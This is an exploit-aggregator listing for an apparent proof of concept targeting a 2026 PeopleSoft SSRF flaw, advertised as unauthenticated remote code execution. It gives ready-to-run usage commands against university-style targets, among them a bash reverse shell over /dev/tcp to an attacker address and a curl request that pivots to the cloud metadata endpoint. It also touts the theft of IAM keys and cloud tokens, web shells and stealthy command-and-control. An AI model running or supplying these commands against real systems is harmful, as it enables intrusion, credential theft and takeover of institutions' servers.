Exploit for POC_cve_2026_35273

Name: Exploit for POC_cve_2026_35273
Rating: 5 (5 reviews)

2026-06-13 | CVSS 5.4

## https://sploitus.com/exploit?id=6D7408A2-2122-5A74-A614-E322984ACCEE
# POC_cve_2026_35273
Universal Unauthenticated RCE via PeopleSoft SSRF


 Usage Examples :
 ```bash
# Basic command execution
python3 exploit.py -u https://any-university.edu -c "whoami"

# Interactive reverse shell
python3 exploit.py -u https://target.ps.edu -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1" --shell --lhost 10.0.0.1 --lport 4444

# Manual SSRF testing (if automation fails)
curl -k -X POST https://target.edu/PSIGW/HttpListeningConnector \
  -H "Content-Type: application/xml" \
  -d 'http://169.254.169.254/latest/meta-data/'
```
Features and	Why they Matter
``
Auto cloud detection	Works on AWS, Azure, GCP, or on‑prem without modification

Multi‑stage SSRF	Probes internal services for lateral movement

Credential theft	Steals IAM keys, Azure tokens, or GCP service accounts

Multiple RCE paths	SSM, RunCommand, web shells, reverse shells

Stealthy C2	Uses cloud APIs, not raw sockets
``